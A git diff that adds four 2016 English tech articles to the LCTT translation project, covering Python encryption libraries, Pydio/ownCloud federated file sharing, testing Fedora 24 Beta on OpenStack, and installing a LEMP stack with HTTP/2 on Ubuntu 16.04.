+TypeError: Unicode-objects must be encoded before hashing
+>>> md5.update(b'Python rocks!')
+>>> md5.digest()
+b'\x14\x82\xec\x1b#d\xf6N}\x16*+[\x16\xf4w'
+```
+
+Let’s take a moment to break this down a bit. First off, we import **hashlib** and then we create an instance of an md5 HASH object. Next we add some text to the hash object and we get a traceback. It turns out that to use the md5 hash, you have to pass it a byte string instead of a regular string. So we try that and then call its **digest** method to get our hash. If you prefer the hex digest, we can do that too:
+
+```
+>>> md5.hexdigest()
+'1482ec1b2364f64e7d162a2b5b16f477'
+```
+
+There’s actually a shortcut method of creating a hash, so we’ll look at that next when we create our sha1 hash:
+
+```
+>>> sha = hashlib.sha1(b'Hello Python').hexdigest()
+>>> sha
+'422fbfbc67fe17c86642c5eaaa48f8b670cbed1b'
+```
+
+As you can see, we can create our hash instance and call its digest method at the same time. Then we print out the hash to see what it is. I chose to use the sha1 hash as it has a nice short hash that will fit the page better. But it’s also less secure, so feel free to try one of the others.
+
+---
+
+### Key Derivation
+
+Python has pretty limited support for key derivation built into the standard library. In fact, the only method that hashlib provides is the **pbkdf2_hmac** method, which is the PKCS#5 password-based key derivation function 2. It uses HMAC as its pseudorandom function. You might use something like this for hashing your password as it supports a salt and iterations. For example, if you were to use SHA-256 you would need a salt of at least 16 bytes and a minimum of 100,000 iterations.
+
+As a quick aside, a salt is just random data that you use as additional input into your hash to make it harder to “unhash” your password. Basically it protects your password from dictionary attacks and pre-computed rainbow tables.
+
+Let’s look at a simple example:
+
+```
+>>> import binascii
+>>> dk = hashlib.pbkdf2_hmac(hash_name='sha256',
+ password=b'bad_password34',
+ salt=b'bad_salt',
+ iterations=100000)
+>>> binascii.hexlify(dk)
+b'6e97bad21f6200f9087036a71e7ca9fa01a59e1d697f7e0284cd7f9b897d7c02'
+```
+
+Here we create a SHA256 hash on a password using a lousy salt but with 100,000 iterations. Of course, SHA is not actually recommended for deriving keys from passwords. Instead you should use something like **scrypt**. Another good option would be the 3rd party package bcrypt, which is designed specifically with password hashing in mind.
+
+---
+
+### PyCryptodome
+
+The PyCrypto package is probably the most well known 3rd party cryptography package for Python. Sadly, PyCrypto’s development stopped in 2012. Others have continued to release the latest version of PyCrypto, so you can still get it for Python 3.5 if you don’t mind using a 3rd party’s binary. For example, I found some binary Python 3.5 wheels for PyCrypto on Github (https://github.com/sfbahr/PyCrypto-Wheels).
+
+Fortunately, there is a fork of the project called PyCryptodome that is a drop-in replacement for PyCrypto. To install it on Linux, you can use the following pip command:
+
+
+```
+pip install pycryptodome
+```
+
+Windows is a bit different:
+
+```
+pip install pycryptodomex
+```
+
+If you run into issues, it’s probably because you don’t have the right dependencies installed or you need a compiler for Windows. Check out the PyCryptodome [website][1] for additional installation help or to contact support.
+
+Also worth noting is that PyCryptodome has many enhancements over the last version of PyCrypto. It is well worth your time to visit their home page and see what new features exist.
+
+### Encrypting a String
+
+Once you’re done checking their website out, we can move on to some examples. For our first trick, we’ll use DES to encrypt a string:
+
+```
+>>> from Crypto.Cipher import DES
+>>> key = 'abcdefgh'
+>>> def pad(text):
+ while len(text) % 8 != 0:
+ text += ' '
+ return text
+>>> des = DES.new(key, DES.MODE_ECB)
+>>> text = 'Python rocks!'
+>>> padded_text = pad(text)
+>>> encrypted_text = des.encrypt(text)
+Traceback (most recent call last):
+ File "", line 1, in
+ encrypted_text = des.encrypt(text)
+ File "C:\Programs\Python\Python35-32\lib\site-packages\Crypto\Cipher\blockalgo.py", line 244, in encrypt
+ return self._cipher.encrypt(plaintext)
+ValueError: Input strings must be a multiple of 8 in length
+>>> encrypted_text = des.encrypt(padded_text)
+>>> encrypted_text
+b'>\xfc\x1f\x16x\x87\xb2\x93\x0e\xfcH\x02\xd59VQ'
+```
+
+This code is a little confusing, so let’s spend some time breaking it down. First off, it should be noted that the key size for DES encryption is 8 bytes, which is why we set our key variable to an eight-character string. The string that we will be encrypting must be a multiple of 8 in length, so we create a function called **pad** that can pad any string out with spaces until it’s a multiple of 8. Next we create an instance of DES and some text that we want to encrypt. We also create a padded version of the text. Just for fun, we attempt to encrypt the original unpadded variant of the string which raises a **ValueError**. Here we learn that we need that padded string after all, so we pass that one in instead. As you can see, we now have an encrypted string!
+
+Of course the example wouldn’t be complete if we didn’t know how to decrypt our string:
+
+```
+>>> des.decrypt(encrypted_text)
+b'Python rocks! '
+```
+
+Fortunately, that is very easy to accomplish as all we need to do is call the **decrypt** method on our des object to get our decrypted byte string back. Our next task is to learn how to encrypt and decrypt a file with PyCrypto using RSA. But first we need to create some RSA keys!
+
+### Create an RSA Key
+
+If you want to encrypt your data with RSA, then you’ll need to either have access to a public / private RSA key pair or you will need to generate your own. For this example, we will just generate our own. Since it’s fairly easy to do, we will do it in Python’s interpreter:
+
+```
+>>> from Crypto.PublicKey import RSA
+>>> code = 'nooneknows'
+>>> key = RSA.generate(2048)
+>>> encrypted_key = key.exportKey(passphrase=code, pkcs=8,
+ protection="scryptAndAES128-CBC")
+>>> with open('/path_to_private_key/my_private_rsa_key.bin', 'wb') as f:
+ f.write(encrypted_key)
+>>> with open('/path_to_public_key/my_rsa_public.pem', 'wb') as f:
+ f.write(key.publickey().exportKey())
+```
+
+First we import **RSA** from **Crypto.PublicKey**. Then we create a silly passcode. Next we generate an RSA key of 2048 bits. Now we get to the good stuff. To generate a private key, we need to call our RSA key instance’s **exportKey** method and give it our passcode, which PKCS standard to use and which encryption scheme to use to protect our private key. Then we write the file out to disk.
+
+Next we create our public key via our RSA key instance’s **publickey** method. We used a shortcut in this piece of code by just chaining the call to exportKey with the publickey method call to write it to disk as well.
+
+### Encrypting a File
+
+Now that we have both a private and a public key, we can encrypt some data and write it to a file. Here’s a pretty standard example:
+
+```
+from Crypto.PublicKey import RSA
+from Crypto.Random import get_random_bytes
+from Crypto.Cipher import AES, PKCS1_OAEP
+
+with open('/path/to/encrypted_data.bin', 'wb') as out_file:
+ recipient_key = RSA.import_key(
+ open('/path_to_public_key/my_rsa_public.pem').read())
+ session_key = get_random_bytes(16)
+
+ cipher_rsa = PKCS1_OAEP.new(recipient_key)
+ out_file.write(cipher_rsa.encrypt(session_key))
+
+ cipher_aes = AES.new(session_key, AES.MODE_EAX)
+ data = b'blah blah blah Python blah blah'
+ ciphertext, tag = cipher_aes.encrypt_and_digest(data)
+
+ out_file.write(cipher_aes.nonce)
+ out_file.write(tag)
+ out_file.write(ciphertext)
+```
+
+The first three lines cover our imports from PyCryptodome. Next we open up a file to write to. Then we import our public key into a variable and create a 16-byte session key. For this example we are going to be using a hybrid encryption method, so we use PKCS#1 OAEP, which is Optimal asymmetric encryption padding. This allows us to write data of arbitrary length to the file. Then we create our AES cipher, create some data and encrypt the data. This will return the encrypted text and the MAC. Finally we write out the nonce, MAC (or tag) and the encrypted text.
+
+As an aside, a nonce is an arbitrary number that is only used once in cryptographic communication. Nonces are usually random or pseudorandom numbers. For AES, the nonce must be at least 16 bytes in length. Feel free to try opening the encrypted file in your favorite text editor. You should just see gibberish.
+
+Now let’s learn how to decrypt our data:
+
+```
+from Crypto.PublicKey import RSA
+from Crypto.Cipher import AES, PKCS1_OAEP
+
+code = 'nooneknows'
+
+with open('/path/to/encrypted_data.bin', 'rb') as fobj:
+    private_key = RSA.import_key(
+        open('/path_to_private_key/my_private_rsa_key.bin').read(),
+        passphrase=code)
+
+ enc_session_key, nonce, tag, ciphertext = [ fobj.read(x)
+ for x in (private_key.size_in_bytes(),
+ 16, 16, -1) ]
+
+ cipher_rsa = PKCS1_OAEP.new(private_key)
+ session_key = cipher_rsa.decrypt(enc_session_key)
+
+ cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)
+ data = cipher_aes.decrypt_and_verify(ciphertext, tag)
+
+print(data)
+```
+
+If you followed the previous example, this code should be pretty easy to parse. In this case, we are opening our encrypted file for reading in binary mode. Then we import our private key. Note that when you import the private key, you must give it your passcode. Otherwise you will get an error. Next we read in our file. You will note that we read in the encrypted session key first (its length equals the private key’s size in bytes), then the next 16 bytes for the nonce, followed by 16 bytes for the tag, and finally the rest of the file, which is our data.
+
+Then we need to decrypt our session key, recreate our AES key and decrypt the data.
+
+You can use PyCryptodome to do much, much more. However we need to move on and see what else we can use for our cryptographic needs in Python.
+
+---
+
+### The cryptography package
+
+The **cryptography** package aims to be “cryptography for humans” much like the **requests** library is “HTTP for Humans”. The idea is that you will be able to create simple cryptographic recipes that are safe and easy-to-use. If you need to, you can drop down to low-level cryptographic primitives, which require you to know what you’re doing or you might end up creating something that’s not very secure.
+
+If you are using Python 3.5, you can install it with pip, like so:
+
+```
+pip install cryptography
+```
+
+You will see that cryptography installs a few dependencies along with itself. Assuming that they all completed successfully, we can try encrypting some text. Let’s give the **Fernet** symmetric encryption algorithm a try. The Fernet algorithm guarantees that any message you encrypt with it cannot be manipulated or read without the key you define. Fernet also supports key rotation via **MultiFernet**. Let’s take a look at a simple example:
+
+```
+>>> from cryptography.fernet import Fernet
+>>> cipher_key = Fernet.generate_key()
+>>> cipher_key
+b'APM1JDVgT8WDGOWBgQv6EIhvxl4vDYvUnVdg-Vjdt0o='
+>>> cipher = Fernet(cipher_key)
+>>> text = b'My super secret message'
+>>> encrypted_text = cipher.encrypt(text)
+>>> encrypted_text
+(b'gAAAAABXOnV86aeUGADA6mTe9xEL92y_m0_TlC9vcqaF6NzHqRKkjEqh4d21PInEP3C9HuiUkS9f'
+ b'6bdHsSlRiCNWbSkPuRd_62zfEv3eaZjJvLAm3omnya8=')
+>>> decrypted_text = cipher.decrypt(encrypted_text)
+>>> decrypted_text
+b'My super secret message'
+```
+
+First off we need to import Fernet. Next we generate a key. We print out the key to see what it looks like. As you can see, it’s a random byte string. If you want, you can try running the **generate_key** method a few times. The result will always be different. Next we create our Fernet cipher instance using our key.
+
+Now we have a cipher we can use to encrypt and decrypt our message. The next step is to create a message worth encrypting and then encrypt it using the **encrypt** method. I went ahead and printed out the encrypted text so you can see that you can no longer read the text. To **decrypt** our super secret message, we just call decrypt on our cipher and pass it the encrypted text. The result is we get a plain text byte string of our message.
+
+---
+
+### Wrapping Up
+
+This chapter barely scratched the surface of what you can do with PyCryptodome and the cryptography packages. However it does give you a decent overview of what can be done with Python in regards to encrypting and decrypting strings and files. Be sure to read the documentation and start experimenting to see what else you can do!
+
+---
+
+### Related Reading
+
+PyCrypto Wheels for Python 3 on [github][2]
+
+PyCryptodome [documentation][3]
+
+Python’s Cryptographic [Services][4]
+
+The cryptography package’s [website][5]
+
+------------------------------------------------------------------------------
+
+via: http://www.blog.pythonlibrary.org/2016/05/18/python-3-an-intro-to-encryption/
+
+作者:[Mike][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.blog.pythonlibrary.org/author/mld/
+[1]: http://pycryptodome.readthedocs.io/en/latest/
+[2]: https://github.com/sfbahr/PyCrypto-Wheels
+[3]: http://pycryptodome.readthedocs.io/en/latest/src/introduction.html
+[4]: https://docs.python.org/3/library/crypto.html
+[5]: https://cryptography.io/en/latest/
diff --git a/sources/tech/20160519 The future of sharing: integrating Pydio and ownCloud.md b/sources/tech/20160519 The future of sharing: integrating Pydio and ownCloud.md
new file mode 100644
index 0000000000..0461fda34d
--- /dev/null
+++ b/sources/tech/20160519 The future of sharing: integrating Pydio and ownCloud.md
@@ -0,0 +1,65 @@
+The future of sharing: integrating Pydio and ownCloud
+=========================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BIZ_darwincloud_520x292_0311LL.png?itok=5yWIaEDe)
+>Image by: opensource.com
+
+The open source file sharing ecosystem accommodates a large variety of projects, each supplying their own solution, and each with a different approach. There are a lot of reasons to choose an open source solution rather than commercial solutions like Dropbox, Google Drive, iCloud, or OneDrive. These solutions offer to take away worries about managing your data but come with certain limitations, including a lack of control and integration into existing infrastructure.
+
+There are quite a few file sharing and sync alternatives available to users, including ownCloud and Pydio.
+
+### Pydio
+
+The Pydio (Put your data in orbit) project was founded by musician Charles du Jeu, who needed a way to share large audio files with his bandmates. [Pydio][1] is a file sharing and sync solution, with multiple storage backends, designed with developers and system administrators in mind. It has over one million downloads worldwide and has been translated into 27 languages.
+
+Open source from the very start, the project grew organically on [SourceForge][2] and now finds its home on [GitHub][3].
+
+The user interface is based on Google's [Material Design][4]. Users can use an existing legacy file infrastructure or set up Pydio with an on-premise approach, and use web, desktop, and mobile applications to manage their assets everywhere. For administrators, the fine-grained access rights are a powerful tool for configuring access to assets.
+
+On the [Pydio community page][5], you will find several resources to get you up to speed quickly. The Pydio website gives some clear guidelines on [how to contribute][6] to the Pydio repositories on GitHub. The [forum][7] includes sections for developers and community.
+
+### ownCloud
+
+[ownCloud][8] has over 8 million users worldwide and is an open source, self-hosted file sync and sharing technology. There are sync clients for all major platforms as well as WebDAV through a web interface. ownCloud has an easy to use interface, powerful administrator tools, and extensive sharing and collaboration features—designed to give users control over their data.
+
+ownCloud's open architecture is extensible via an API and offers a platform for apps. Over 300 applications have been written, featuring capabilities like handling calendar, contacts, mail, music, passwords, notes, and many other types of data. ownCloud provides security, scales from a Raspberry Pi to a cluster with petabytes of storage and millions of users, and is developed by an international community of hundreds of contributors.
+
+### Federated sharing
+
+File sharing is starting to shift toward teamwork, and standardization provides a solid basis for such collaboration.
+
+Federated sharing, a new open standard supported by the [OpenCloudMesh][9] project, is a step in that direction. Among other things, it allows for the sharing of files and folders between servers that support this, like Pydio and ownCloud instances.
+
+First introduced in ownCloud 7, this server-to-server sharing allows you to mount file shares from remote servers, in effect creating your own cloud of clouds. You can create direct share links with users on other servers that support federated cloud sharing.
+
+Implementing this new API allows for deeper integration between storage solutions while maintaining the security, control, and attributes of the original platforms.
+
+"Exchanging and sharing files is something that is essential today and tomorrow," ownCloud founder Frank Karlitschek said. "Because of that, it is important to do this in a federated and distributed way without centralized data silos. The number one design goal [of federated sharing] is to enable sharing in the most seamless and easiest way while protecting the security and privacy of the users."
+
+### What's next?
+
+An initiative like OpenCloudMesh will extend this new open standard of file sharing through cooperation of institutions and companies like Pydio and ownCloud. ownCloud 9 has already introduced the ability for federated servers to exchange user lists, enabling the same seamless auto-complete experience you have with users on your own server. In the future, the idea of having a (federated!) set of central address book servers that can be used to search for others' federated cloud IDs might bring inter-cloud collaboration to an even higher level.
+
+The initiative will undoubtedly contribute to the already growing open technical community, within which members can easily discuss, develop, and contribute to the "OCM sharing API" as a vendor-neutral protocol. All leading partners of the OCM project are fully committed to the open API design principle and welcome other open source file share and sync communities to participate and join the connected cloud.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/business/16/5/sharing-files-pydio-owncloud
+
+作者:[ben van 't ende][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/benvantende
+[1]: https://pydio.com/
+[2]: https://sourceforge.net/projects/ajaxplorer/
+[3]: https://github.com/pydio/
+[4]: https://www.google.com/design/spec/material-design/introduction.html
+[5]: https://pydio.com/en/community
+[6]: https://pydio.com/en/community/contribute
+[7]: https://pydio.com/forum/f
+[8]: https://owncloud.org/
+[9]: https://wiki.geant.org/display/OCM/Open+Cloud+Mesh
diff --git a/sources/tech/20160524 Test Fedora 24 Beta in an OpenStack cloud.md b/sources/tech/20160524 Test Fedora 24 Beta in an OpenStack cloud.md
new file mode 100644
index 0000000000..c550880223
--- /dev/null
+++ b/sources/tech/20160524 Test Fedora 24 Beta in an OpenStack cloud.md
@@ -0,0 +1,77 @@
+Test Fedora 24 Beta in an OpenStack cloud
+===========================================
+
+![](https://major.io/wp-content/uploads/2012/01/fedorainfinity.png)
+
+Although there are a few weeks remaining before [Fedora 24][1] is released, you can test out the Fedora 24 Beta release today! This is a great way to get [a sneak peek at new features][2] and help find bugs that still need a fix.
+
+The [Fedora Cloud][3] image is available for download from your favorite [local mirror][4] or directly from [Fedora’s servers][5]. In this post, I’ll show you how to import this image into an OpenStack environment and begin testing Fedora 24 Beta.
+
+One last thing: this is beta software. It has been reliable for me so far, but your experience may vary. I would recommend waiting for the final release before deploying any mission critical applications on it.
+
+### Importing the image
+
+The older glance client (version 1) allows you to import an image from a URL that is reachable from your OpenStack environment. This is helpful since my OpenStack cloud has a much faster connection to the internet (1 Gbps) than my home does (~20 Mbps upload speed). However, the functionality to import from a URL was [removed in version 2 of the glance client][6]. The [OpenStackClient][7] doesn’t offer the feature either.
+
+There are two options here:
+
+- Install an older version of the glance client
+- Use Horizon (the web dashboard)
+
+Getting an older version of glance client installed is challenging. The OpenStack requirements file for the liberty release [leaves the version of glance client without a maximum version cap][8] and it’s difficult to get all of the dependencies in order to make the older glance client work.
+
+Let’s use Horizon instead so we can get back to the reason for the post.
+
+### Adding an image in Horizon
+
+Log into the Horizon panel and click Compute > Images. Click + Create Image at the top right of the page and a new window should appear. Add this information in the window:
+
+- **Name**: Fedora 24 Cloud Beta
+- **Image Source**: Image Location
+- **Image Location**: http://mirrors.kernel.org/fedora/releases/test/24_Beta/CloudImages/x86_64/images/Fedora-Cloud-Base-24_Beta-1.6.x86_64.qcow2
+- **Format**: QCOW2 – QEMU Emulator
+- **Copy Data**: ensure the box is checked
+
+When you’re finished, the window should look like this:
+
+![](https://major.io/wp-content/uploads/2016/05/horizon_image.png)
+
+Click Create Image and the images listing should show Saving for a short period of time. Once it switches to Active, you’re ready to build an instance.
+
+### Building the instance
+
+Since we’re already in Horizon, we can finish out the build process there.
+
+On the image listing page, find the row with the image we just uploaded and click Launch Instance on the right side. A new window will appear. The Image Name drop down should already have the Fedora 24 Beta image selected. From here, just choose an instance name, select a security group and keypair (on the Access & Security tab), and a network (on the Networking tab). Be sure to choose a flavor that has some available storage as well (m1.tiny is not enough).
+
+Click Launch and wait for the instance to boot.
+
+Once the instance build has finished, you can connect to the instance over ssh as the fedora user. If your [security group allows the connection][9] and your keypair was configured correctly, you should be inside your new Fedora 24 Beta instance!
+
+Not sure what to do next? Here are some suggestions:
+
+- Update all packages and reboot (to ensure that you are testing the latest updates)
+- Install some familiar applications and verify that they work properly
+- Test out your existing automation or configuration management tools
+- Open bug tickets!
+
+--------------------------------------------------------------------------------
+
+via: https://major.io/2016/05/24/test-fedora-24-beta-openstack-cloud/
+
+作者:[major.io][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://major.io/about-the-racker-hacker/
+[1]: https://fedoraproject.org/wiki/Releases/24/Schedule
+[2]: https://fedoraproject.org/wiki/Releases/24/ChangeSet
+[3]: https://getfedora.org/en/cloud/
+[4]: https://admin.fedoraproject.org/mirrormanager/mirrors/Fedora/24/x86_64
+[5]: https://getfedora.org/en/cloud/download/
+[6]: https://wiki.openstack.org/wiki/Glance-v2-v1-client-compatability
+[7]: http://docs.openstack.org/developer/python-openstackclient/
+[8]: https://github.com/openstack/requirements/blob/stable/liberty/global-requirements.txt#L159
+[9]: https://major.io/2016/05/16/troubleshooting-openstack-network-connectivity/
diff --git a/sources/tech/20160530 Install LEMP with MariaDB 10, PHP 7 and HTTP 2.0 Support for Nginx on Ubuntu 16.04.md b/sources/tech/20160530 Install LEMP with MariaDB 10, PHP 7 and HTTP 2.0 Support for Nginx on Ubuntu 16.04.md
new file mode 100644
index 0000000000..ef713fff0f
--- /dev/null
+++ b/sources/tech/20160530 Install LEMP with MariaDB 10, PHP 7 and HTTP 2.0 Support for Nginx on Ubuntu 16.04.md
@@ -0,0 +1,304 @@
+Translating by strugglingyouth
+
+Install LEMP with MariaDB 10, PHP 7 and HTTP 2.0 Support for Nginx on Ubuntu 16.04
+=====================================================================================
+
+
+LEMP is an acronym for a group of packages (Linux OS, Nginx web server, MySQL/MariaDB database and the PHP server-side dynamic programming language) which are used to deploy dynamic web applications and web pages.
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Install-Nginx-with-FastCGI-on-Ubuntu-16.04.png)
+>Install Nginx with MariaDB 10, PHP 7 and HTTP 2.0 Support on Ubuntu 16.04
+
+This tutorial will guide you on how to install a LEMP stack (Nginx with MariaDB and PHP7) on Ubuntu 16.04 server.
+
+#### Requirements
+
+[Installation of Ubuntu 16.04 Server Edition][1]
+
+### Step 1: Install the Nginx Web Server
+
+#### 1. Nginx is a modern and resource-efficient web server used to serve web pages to visitors on the internet. We’ll start by installing the Nginx web server from Ubuntu’s official repositories by using the [apt command line][2].
+
+```
+$ sudo apt-get install nginx
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Install-Nginx-on-Ubuntu-16.04.png)
+>Install Nginx on Ubuntu 16.04
+
+#### 2. Next, issue the [netstat][3] and [systemctl][4] commands in order to confirm that Nginx is started and bound on port 80.
+
+```
+$ netstat -tlpn
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Check-Nginx-Network-Port-Connection.png)
+>Check Nginx Network Port Connection
+
+```
+$ sudo systemctl status nginx.service
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Check-Nginx-Service-Status.png)
+>Check Nginx Service Status
+
+Once you have confirmed that the server is started, you can open a browser and navigate to your server’s IP address or DNS record over HTTP in order to visit the Nginx default web page.
+
+```
+http://IP-Address
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Verify-Nginx-Webpage.png)
+>Verify Nginx Webpage
+
+### Step 2: Enable Nginx HTTP/2.0 Protocol
+
+#### 3. The HTTP/2.0 protocol, which is built in by default in the latest release of the Nginx binaries on Ubuntu 16.04, works only in conjunction with SSL and promises a huge speed improvement in loading SSL web pages.
+
+To enable the protocol in Nginx on Ubuntu 16.04, first navigate to the Nginx available-sites configuration directory and back up the default configuration file by issuing the commands below.
+
+```
+$ cd /etc/nginx/sites-available/
+$ sudo mv default default.backup
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Backup-Nginx-Sites-Configuration-File.png)
+>Backup Nginx Sites Configuration File
+
+#### 4. Then, using a text editor create a new default page with the below instructions:
+
+```
+server {
+ listen 443 ssl http2 default_server;
+ listen [::]:443 ssl http2 default_server;
+
+ root /var/www/html;
+
+ index index.html index.htm index.php;
+
+ server_name 192.168.1.13;
+
+ location / {
+ try_files $uri $uri/ =404;
+ }
+
+ ssl_certificate /etc/nginx/ssl/nginx.crt;
+ ssl_certificate_key /etc/nginx/ssl/nginx.key;
+
+ ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
+ ssl_prefer_server_ciphers on;
+ ssl_ciphers EECDH+CHACHA20:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
+ ssl_dhparam /etc/nginx/ssl/dhparam.pem;
+ ssl_session_cache shared:SSL:20m;
+ ssl_session_timeout 180m;
+ resolver 8.8.8.8 8.8.4.4;
+        # Append "; includeSubDomains" to the value below to also apply HSTS to subdomains.
+        add_header Strict-Transport-Security "max-age=31536000" always;
+
+
+ location ~ \.php$ {
+ include snippets/fastcgi-php.conf;
+ fastcgi_pass unix:/run/php/php7.0-fpm.sock;
+ }
+
+ location ~ /\.ht {
+ deny all;
+ }
+
+}
+
+server {
+ listen 80;
+ listen [::]:80;
+ server_name 192.168.1.13;
+ return 301 https://$server_name$request_uri;
+}
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Enable-Nginx-HTTP-2-Protocol.png)
+>Enable Nginx HTTP 2 Protocol
+
+The above configuration snippet enables the use of `HTTP/2.0` by adding the http2 parameter to all SSL listen directives.
+
+The last server block of the excerpt is used to redirect all non-SSL traffic to the SSL/TLS default host. Also, replace the `server_name` directive value to match your own IP address or DNS record (an FQDN preferably).
+
+#### 5. Once you have finished editing the Nginx default configuration file with the above settings, generate and list the SSL certificate file and key by executing the below commands.
+
+Fill in the certificate with your own custom settings, and pay attention to the Common Name setting: it must match the DNS FQDN record or the server IP address that will be used to access the web page.
+
+```
+$ sudo mkdir /etc/nginx/ssl
+$ sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/ssl/nginx.key -out /etc/nginx/ssl/nginx.crt
+$ ls /etc/nginx/ssl/
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Generate-SSL-Certificate-and-Key.png)
+>Generate SSL Certificate and Key for Nginx
+
+#### 6. Also, create strong Diffie-Hellman parameters, which are referenced in the above configuration file on the `ssl_dhparam` instruction line, by issuing the below command:
+
+```
+$ sudo openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Create-Diffie-Hellman-Key.png)
+>Create Diffie-Hellman Key
+
+#### 7. Once the `Diffie-Hellman` key has been created, verify that the Nginx configuration file is correctly written and can be applied by the Nginx web server, then restart the daemon to reflect the changes, by running the below commands.
+
+```
+$ sudo nginx -t
+$ sudo systemctl restart nginx.service
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Check-Nginx-Configuration.png)
+>Check Nginx Configuration
+
+#### 8. In order to test whether Nginx uses the HTTP/2.0 protocol, issue the below command. The presence of `h2` among the advertised protocols confirms that Nginx has been successfully configured to use HTTP/2.0. All modern up-to-date browsers support this protocol by default.
+
+```
+$ openssl s_client -connect localhost:443 -nextprotoneg ''
+```
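+
+Note that `-nextprotoneg` relies on NPN, which is deprecated in newer OpenSSL releases. As a hedged alternative (not part of the original article), you can query the ALPN-negotiated protocol instead:
+
+```
+$ openssl s_client -connect localhost:443 -alpn h2 < /dev/null 2>/dev/null | grep -i alpn
+```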
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Test-Nginx-HTTP-2-Protocol.png)
+>Test Nginx HTTP 2.0 Protocol
+
+### Step 3: Install PHP 7 Interpreter
+
+Nginx can be used with the PHP dynamic processing language interpreter to generate dynamic web content, with the help of the FastCGI process manager obtained by installing the php-fpm binary package from the official Ubuntu repositories.
+
+#### 9. In order to grab PHP7.0 and the additional packages that will allow PHP to communicate with the Nginx web server, issue the below command on your server console:
+
+```
+$ sudo apt install php7.0 php7.0-fpm
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Install-PHP-7-PHP-FPM-for-Ngin.png)
+>Install PHP 7 and PHP-FPM for Nginx
+
+#### 10. Once the PHP7.0 interpreter has been successfully installed on your machine, start and check the php7.0-fpm daemon by issuing the below commands:
+
+```
+$ sudo systemctl start php7.0-fpm
+$ sudo systemctl status php7.0-fpm
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Start-Verify-php-fpm-Service.png)
+>Start and Verify php-fpm Service
+
+#### 11. The current Nginx configuration file is already set up to use the PHP FastCGI process manager in order to serve dynamic content.
+
+The server block that enables Nginx to use PHP interpreter is presented on the below excerpt, so no further modifications of default Nginx configuration file are required.
+
+```
+location ~ \.php$ {
+ include snippets/fastcgi-php.conf;
+ fastcgi_pass unix:/run/php/php7.0-fpm.sock;
+ }
+```
+
+Below is a screenshot of the instructions you would need to uncomment and modify in case of an original Nginx default configuration file.
+
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Enable-PHP-FastCGI-for-Nginx.png)
+>Enable PHP FastCGI for Nginx
+
+#### 12. To test the Nginx web server’s integration with the PHP FastCGI process manager, create a PHP `info.php` test file by issuing the below command and verify the settings by visiting it at the following address: `http://IP_or_domain/info.php`.
+
+```
+$ sudo su -c 'echo "<?php phpinfo(); ?>" | tee /var/www/html/info.php'
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Create-PHP-Info-File.png)
+>Create PHP Info File
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Verify-PHP-FastCGI-Info.png)
+>Verify PHP FastCGI Info
+
+Also check whether the HTTP/2.0 protocol is advertised by the server by locating the line `$_SERVER['SERVER_PROTOCOL']` in the PHP Variables block, as illustrated in the below screenshot.
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Check-HTTP-2.0-Protocol-Info.png)
+>Check HTTP 2.0 Protocol Info
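+
+Alternatively, assuming your curl build includes HTTP/2 support (not guaranteed on a stock Ubuntu 16.04 install), you can check the negotiated protocol from the command line; `-k` skips verification of the self-signed certificate:
+
+```
+$ curl -k --http2 -sI https://localhost/ | head -n 1
+```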
+
+#### 13. In order to install extra PHP7.0 modules, use the `apt search php7.0` command to find a PHP module and install it.
+
+Also, try to install the following PHP modules which can come in handy in case you are planning to [install WordPress][5] or other CMS.
+
+```
+$ sudo apt install php7.0-mcrypt php7.0-mbstring
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Install-PHP-7-Modules.png)
+>Install PHP 7 Modules
+
+#### 14. To register the extra PHP modules, just restart the PHP-FPM daemon by issuing the below command.
+
+```
+$ sudo systemctl restart php7.0-fpm.service
+```
+
+### Step 4: Install MariaDB Database
+
+#### 15. Finally, in order to complete our LEMP stack we need the MariaDB database component to store and manage website data.
+
+Install the MariaDB database management system by running the below commands, and restart the PHP-FPM service in order to use the MySQL module to access the database.
+
+```
+$ sudo apt install mariadb-server mariadb-client php7.0-mysql
+$ sudo systemctl restart php7.0-fpm.service
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Install-MariaDB-for-Nginx.png)
+>Install MariaDB for Nginx
+
+#### 16. To secure the MariaDB installation, run the security script provided by the binary package from the Ubuntu repositories, which will ask you to set a root password, remove anonymous users, disable remote root login and remove the test database.
+
+Run the script by issuing the below command and answer all questions with yes. Use the below screenshot as a guide.
+
+```
+$ sudo mysql_secure_installation
+```
+
